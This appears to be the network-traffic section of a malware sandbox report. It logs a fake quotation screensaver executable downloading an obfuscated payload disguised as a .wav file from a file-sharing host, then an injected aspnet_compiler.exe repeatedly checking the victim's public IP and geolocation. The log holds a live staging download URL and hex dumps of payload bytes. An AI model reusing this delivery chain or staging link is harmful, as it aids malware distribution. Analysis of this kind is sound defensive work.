Nov 18, 2024 18:12:13.689192057 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: adda0a509815c1165e96fedc722dcad0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49984	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:14.525172949 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:12:15.361280918 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2cf7b447d1aa0f7d9eca537c07570bab Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49986	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:16.388256073 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:12:17.224740028 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d85ce1f8e7129503a67a3826b102783b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49988	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:18.101722956 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:12:18.932975054 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bde1664992d2862e6f72b26527ebb996 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49990	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:19.901814938 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:12:21.637130022 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2996517e1910296dee31292b979be343 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:12:21.637650013 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2996517e1910296dee31292b979be343 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:12:21.637759924 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2996517e1910296dee31292b979be343 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:12:21.638437986 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2996517e1910296dee31292b979be343 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49992	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:22.431581974 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:12:23.284288883 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 72eff2f419ebcd5ab32950f8c155f890 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49708	188.114.96.3	443	7628	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:11:09 UTC	95	OUT	GET /data-package/Bh1Kj4RD/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
2024-11-18 17:11:10 UTC	1238	IN	HTTP/1.1 302 Found Date: Mon, 18 Nov 2024 17:11:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=tehcpsui5vr2ro0cu1bnlq0rrh; expires=Mon, 02-Dec-2024 17:11:09 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s23.filetransfer.io/storage/download/mOA1FV1QAe83 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBpOsNOmXEr%2BWPkFFRzyU2Q9Ln9VEn9t4C5zmXvbQQyI1EcKziGd4D5udPBaHBMkI%2Bnl0BPBrZgVlN825Pm1h2UBtrNper5VNb7UM5ymK9bpi8uggvr1aItdxIfy8wCn3rU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4993fc59f862fd-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24449&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=709&delivery_rate=118460&cwnd=32&unsent_bytes=0&cid=417cea188040e122&ts=951&x=0"
2024-11-18 17:11:10 UTC	131	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 33 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 6d 4f 41 31 46 56 31 51 41 65 38 33 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 Data Ascii: 80<h1>Redirect</h1><p><a href="https://s23.filetransfer.io/storage/download/mOA1FV1QAe83">Please click here to continue</a>.</p
2024-11-18 17:11:10 UTC	3	IN	Data Raw: 3e 0d 0a Data Ascii: >
2024-11-18 17:11:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49714	188.114.96.3	443	7628	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:11:10 UTC	98	OUT	GET /storage/download/mOA1FV1QAe83 HTTP/1.1 Host: s23.filetransfer.io Connection: Keep-Alive
2024-11-18 17:11:19 UTC	1243	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:11:19 GMT Content-Type: application/octet-stream Content-Length: 1056768 Connection: close Last-Modified: Mon, 18 Nov 2024 07:14:08 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=4eed0b50d6f28d2be145c886b37ea51d; expires=Mon, 02-Dec-2024 17:11:17 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Hmobykid.wav" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "673ae940-102000" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fhz9EkWx2GMM5%2FDxwHNxsCavgCSSdm6aFlTu3eMwT3OleC%2FnnzEZK4oUFrdk2HWBcT7WqjKd24D60bF%2Fx0BxqKTHgM6477qayEgt6eWlo2k9USqJzTZbLcRfbtg6a2VgSaafjIsL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499404dcfbe75b-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18914&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=712&delivery_rate=153154&cwnd=32&unsent_bytes=0&cid=2c7cab730d0e0623&ts=8403&x=0"
2024-11-18 17:11:19 UTC	126	IN	Data Raw: 75 6e a0 38 37 30 38 34 34 38 34 30 c7 cb 30 38 8c 30 38 34 30 38 34 30 78 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 b8 34 30 38 3a 2f 82 3a 30 8c 3d fd 19 8c 31 74 f9 11 6c 5c 59 4b 14 40 4a 5b 57 4a 55 5d 18 57 51 56 5a 5f 4c 14 52 5d 14 42 4d 5a 10 51 5a 10 7c 7b 63 18 59 5f 5c 51 1e 35 39 3a 1c 34 30 38 34 30 Data Ascii: un870844840080840840x40840840840840840840840840840840840408:/:0=1tl\YK@J[WJU]WQVZ_LR]BMZQZ\|{cY_\Q59:40840
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 38 34 60 7d 34 30 74 35 33 38 66 d8 cd f9 30 38 34 30 38 34 30 38 d4 30 36 15 3b 39 04 30 38 2c 20 38 34 36 38 34 30 38 34 30 16 03 20 38 34 10 38 34 30 78 24 30 38 34 70 38 34 10 38 34 30 3a 34 30 3c 34 30 38 34 30 38 34 34 38 34 30 38 34 30 38 34 b0 28 34 30 3a 34 30 38 34 30 38 37 30 78 b1 30 38 24 30 38 24 30 38 34 30 28 34 30 28 34 30 38 34 30 38 3b 30 38 34 30 38 34 30 38 34 30 38 d4 06 28 34 7b 38 34 30 38 74 20 38 00 33 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 54 20 38 38 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 38 34 30 18 34 30 30 34 30 38 34 30 38 34 30 38 34 30 30 14 30 38 7c 30 38 34 30 38 34 30 38 34 30 38 1a 44 5d 4c 44 Data Ascii: 84`}40t538f0840840806;908, 846840840 84840x$084p84840:40<4084084484084084(40:40840870x08$08$0840(40(408408;08408408408(4{8408t 838408408408408408408T 88084084084084084084084084084084084084084084084084084040040840840840008\|08408408408D]LD
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 34 30 38 34 30 b4 34 30 38 83 31 38 34 73 3a 34 30 01 34 30 38 23 30 38 35 23 08 30 30 3c 34 30 38 34 30 38 34 30 38 23 1a 2b 04 33 38 30 30 38 34 30 38 34 30 38 34 30 12 27 00 3b 34 34 38 34 30 38 34 30 38 34 30 38 1e 23 08 37 30 b8 34 30 38 35 30 38 25 18 90 36 30 3e 14 32 38 34 30 c6 3a 30 38 0c 30 38 34 30 c6 38 30 38 71 33 38 34 30 6f 34 30 38 31 30 38 34 1e 38 34 30 00 66 30 38 34 4e a2 36 30 3c 1c 68 3f 34 36 18 34 30 38 34 4e 60 36 30 3c 4f 7b 3a 34 34 02 f8 cf c7 cb 16 18 34 30 38 34 08 f9 cb cf c7 4a a9 3a 34 34 10 60 37 38 32 10 39 34 30 38 4a 68 3a 34 34 43 51 32 38 30 09 9b cb cf c7 12 10 39 34 30 38 0c a8 c7 cb cf 12 26 30 38 23 1a 38 34 30 2a 34 30 2c 1e 30 38 34 22 38 34 24 12 34 30 38 27 00 3b 34 b0 38 34 30 39 34 30 29 1c 98 3a 34 36 18 Data Ascii: 40840408184s:40408#085#00<408408408#+3800840840840';448408408408#70408508%60>2840:080840808q3840o4081084840f084N60<h?464084N`60<O{:444084J:44`7829408Jh:44CQ2809408&08#840*40,084"84$408';4840940):46
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 51 46 6c 32 38 30 4b 51 36 30 3c 55 4e eb 36 30 3c 1c 0c 30 34 36 18 c0 9e 32 85 10 39 34 30 38 56 10 25 e9 d6 7d 55 4e 60 36 30 3c 4f 79 3a 34 34 59 4a e3 3a 34 34 10 08 38 38 32 18 30 34 30 13 b4 01 38 34 34 18 20 30 38 34 08 97 c8 cf c7 14 15 8d b3 ae 5e 14 2c c8 52 14 59 4a 68 3a 34 34 43 b2 32 38 30 51 46 e7 32 38 30 18 04 3c 30 3e 14 c4 96 3e 81 18 35 30 38 34 52 18 a3 e8 de 71 51 46 6c 32 38 30 4b 71 36 30 3c 55 4e eb 36 30 3c 1c 0c 30 34 36 10 3d 30 38 1f b0 72 34 30 3c 14 25 38 34 30 46 6c 32 38 30 4b b6 36 30 3c 0d 7a c4 cb cf 1e 14 3a 38 34 30 00 0b cc c7 cb 10 65 03 7b 69 14 15 6b f3 27 59 4a 68 3a 34 34 43 79 32 38 30 51 46 e7 32 38 30 18 04 3c 30 3e 14 65 86 0c 59 18 a5 58 96 3a 51 46 6c 32 38 30 4b 69 36 30 3c 55 4e eb 36 30 3c 1c 0c 30 34 Data Ascii: QFl280KQ60<UN60<04629408V%}UN`60<Oy:44YJ:44882040844 084^,RYJh:44C280QF280<0>>5084RqQFl280Kq60<UN60<046=08r40<%840Fl280K60<z:840e{ik'YJh:44Cy280QF280<0>eYX:QFl280Ki60<UN60<04
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 38 34 34 18 34 30 38 34 4e 60 36 30 3c 4f 58 3a 34 34 02 bb c7 c7 cb 16 18 34 30 38 34 08 bc c3 cf c7 14 fa 4f b9 3d 18 6c d8 84 43 51 46 6c 32 38 30 4b 17 36 30 3c 55 4e eb 36 30 3c 1c 0c 30 34 36 18 fd 06 b0 a8 10 ed 08 19 a8 55 4e 60 36 30 3c 4f 67 3a 34 34 59 4a e3 3a 34 34 10 08 38 38 32 18 2e 34 30 13 b4 7b 38 34 34 18 30 30 38 34 ce 36 34 30 00 1c c7 c7 cb 10 b6 69 7f 95 14 78 df 65 d8 59 4a 68 3a 34 34 43 b2 32 38 30 51 46 e7 32 38 30 18 04 3c 30 3e 14 9a 01 ff 5c 5e 14 a9 5a 5f 9b 59 4a 68 3a 34 34 43 68 32 38 30 51 46 e7 32 38 30 18 04 3c 30 3e 1c 27 38 34 1b b8 02 30 38 30 10 1f 34 30 38 0c e7 ce cb cf 18 51 6e 57 fe 10 f5 cb 06 df 55 4e 60 36 30 3c 4f 74 3a 34 34 59 4a e3 3a 34 34 10 08 38 38 32 10 66 8e 6a b6 14 70 a7 e5 8b 61 14 a5 de 4b ca Data Ascii: 8444084N`60<OX:444084O=lCQFl280K60<UN60<046UN`60<Og:44YJ:44882.40{8440084640ixeYJh:44C280QF280<0>\^Z_YJh:44Ch280QF280<0>'84080408QnWUN`60<Ot:44YJ:44882fjpaK
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 1c 0c 30 34 36 10 17 30 38 1f b0 0a 34 30 3c 14 2e 38 34 30 c6 3a 30 38 0c 1c ca cb cf 18 1b 1d 52 3d 55 18 f3 0d 98 b7 51 46 6c 32 38 30 4b 0f 36 30 3c 55 4e eb 36 30 3c 1c 0c 30 34 36 18 e6 5f 91 a7 10 59 3f 8f ca 55 4e 60 36 30 3c 4f b3 3a 34 34 59 4a e3 3a 34 34 10 08 38 38 32 18 1c 34 30 13 b4 1e 38 34 34 18 17 30 38 34 4e 60 36 30 3c 4f 09 3a 34 34 02 e5 c1 c7 cb 16 18 33 30 38 34 08 fe c5 cf c7 14 f0 fe 86 4e 18 94 7a ec bd 51 18 e3 c3 3e 92 51 46 6c 32 38 30 4b 55 36 30 3c 55 4e eb 36 30 3c 1c 0c 30 34 36 18 91 6f bb 95 10 d3 0a 3f df 55 4e 60 36 30 3c 4f 7d 3a 34 34 59 4a e3 3a 34 34 10 08 38 38 32 18 1d 34 30 13 b4 7c 38 34 34 18 16 30 38 34 08 54 c5 cf c7 14 81 9f 28 26 18 de 9d e8 94 51 18 91 5e a7 d9 51 46 6c 32 38 30 4b 56 36 30 3c 55 4e eb Data Ascii: 0460840<.840:08R=UQFl280K60<UN60<046_Y?UN`60<O:44YJ:4488240844084N`60<O:443084NzQ>QFl280KU60<UN60<046o?UN`60<O}:44YJ:4488240\|844084T(&Q^QFl280KV60<UN
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 18 6c 33 30 3e 4a aa 3a 34 34 10 6c 37 38 32 1a 38 5e 18 90 36 30 3e 4a a9 3a 34 34 10 60 37 38 32 4e a2 36 30 3c 1c 68 3f 34 36 12 34 5a 10 9c 32 38 32 4e a1 36 30 3c 1c 64 3f 34 36 46 ae 32 38 30 18 60 33 30 3e 1e 30 52 1c 98 3a 34 36 46 ad 32 38 30 18 6c 33 30 3e 4a aa 3a 34 34 10 6c 37 38 32 1a 38 5e 18 90 36 30 3e 4a a9 3a 34 34 10 60 37 38 32 4e a2 36 30 3c 1c 68 3f 34 36 12 34 33 08 3c 30 3c 34 30 38 34 30 38 34 30 38 34 1a 79 48 30 38 34 30 38 34 87 34 34 30 9a 34 30 38 6d 3d 38 34 09 38 34 30 2f 34 30 39 36 30 38 34 a4 31 34 30 e0 34 30 38 58 3a 38 34 71 38 34 30 38 34 30 38 36 30 38 34 a6 3c 34 30 7b 37 30 38 ed 37 38 34 4c 38 34 30 38 34 30 38 36 30 38 34 f3 39 34 30 1d 35 30 38 dc 32 38 34 59 38 34 30 38 34 30 38 34 30 38 34 61 38 34 30 a1 39 Data Ascii: l30>J:44l7828^60>J:44`782N60<h?464Z282N60<d?46F280`30>0R:46F280l30>J:44l7828^60>J:44`782N60<h?4643<0<4084084084yH084084440408m=84840/4096084140408X:84q84084086084<40{708784L84084086084940508284Y84084084084a8409
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2c 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2c 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 38 34 30 38 34 30 38 34 1a 2a 34 30 2f 1e 30 38 34 23 08 37 30 3c 34 30 Data Ascii: 40/084#70<408408408440,084#70<408408408440/084#70<408408408440/084#70<408408408440/084#70<408408408440/084#70<408408408440,084#70<408408408440/084#70<408408408440/084#70<408408408440/084#70<4084084084*40/084#70<40
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 34 30 29 1c 98 3a 34 36 18 36 30 38 34 ce 36 34 30 00 34 30 38 34 ce 34 34 30 7d 37 30 38 34 35 38 34 30 3e 34 30 38 1b 30 38 34 08 38 34 30 38 1e 4e a2 36 30 3c 1c 68 3f 34 36 18 34 30 38 34 4e 60 36 30 3c 4f 6c 3a 34 34 02 ff cf c7 cb 16 18 34 30 38 34 08 f8 cb cf c7 4a a9 3a 34 34 10 60 37 38 32 10 38 34 30 38 4a 68 3a 34 34 43 45 32 38 30 09 9a cb cf c7 12 10 39 34 30 38 0c a7 c7 cb cf 2a 34 30 2f 1e 30 38 34 22 38 34 24 12 34 30 38 26 30 38 20 1a 38 34 30 2b 04 33 38 30 30 38 34 30 38 34 30 38 34 30 12 27 00 3b 34 34 38 34 30 38 34 30 38 34 30 38 1e 23 08 37 30 b8 34 30 38 35 30 38 25 18 90 36 30 3e 14 31 38 34 30 c6 3a 30 38 0c 30 38 34 30 c6 38 30 38 71 33 38 34 30 3d 34 30 38 1a 30 38 34 67 38 34 30 00 34 30 38 34 4e a2 36 30 3c 1c 68 3f 34 36 18 Data Ascii: 40):4660846404084440}70845840>4080848408N60<h?464084N`60<Ol:444084J:44`7828408Jh:44CE2809408*40/084"84$408&08 840+3800840840840';448408408408#70408508%60>1840:080840808q3840=408084g8404084N60<h?46
2024-11-18 17:11:19 UTC	1369	IN	Data Raw: 30 38 26 30 38 22 1a 38 34 30 2a 34 30 2e 1e 30 38 34 22 38 34 27 12 34 30 38 26 30 38 23 1a 38 34 30 2a 34 30 2f 1e 30 38 34 22 38 34 27 12 34 30 38 16 30 2c 91 14 38 34 31 12 34 30 38 37 00 31 34 34 38 34 30 38 34 30 38 34 30 2f 1e 23 08 33 30 3c 34 30 38 34 30 38 34 30 38 34 1a 3b 04 38 38 30 30 38 34 30 38 34 30 38 34 30 12 75 2c 38 34 30 38 34 30 a2 34 30 38 cb 31 38 34 a9 3a 34 30 00 34 30 38 23 30 38 35 33 08 3c 30 3c 34 30 38 34 30 38 34 30 38 34 1a 79 78 30 38 34 30 38 34 eb 38 34 30 7d 34 30 38 14 31 38 34 09 38 34 30 2f 34 30 39 36 30 38 34 e6 39 34 30 75 35 30 38 17 33 38 34 06 38 34 30 38 34 30 38 34 30 38 34 6b 38 34 30 8c 37 30 38 3b 34 38 34 08 38 34 30 2f 34 30 39 27 00 3b 34 34 38 34 30 38 34 30 38 34 30 38 1e 23 08 37 30 b8 34 30 38 35 Data Ascii: 08&08"84040.084"84'408&08#84040/084"84'4080,8414087144840840840/#30<4084084084;8800840840840u,840840408184:40408#0853<0<4084084084yx084084840}408184840/4096084940u50838484084084084k840708;484840/409';448408408408#704085

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49980	188.114.97.3	443	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:12:10 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
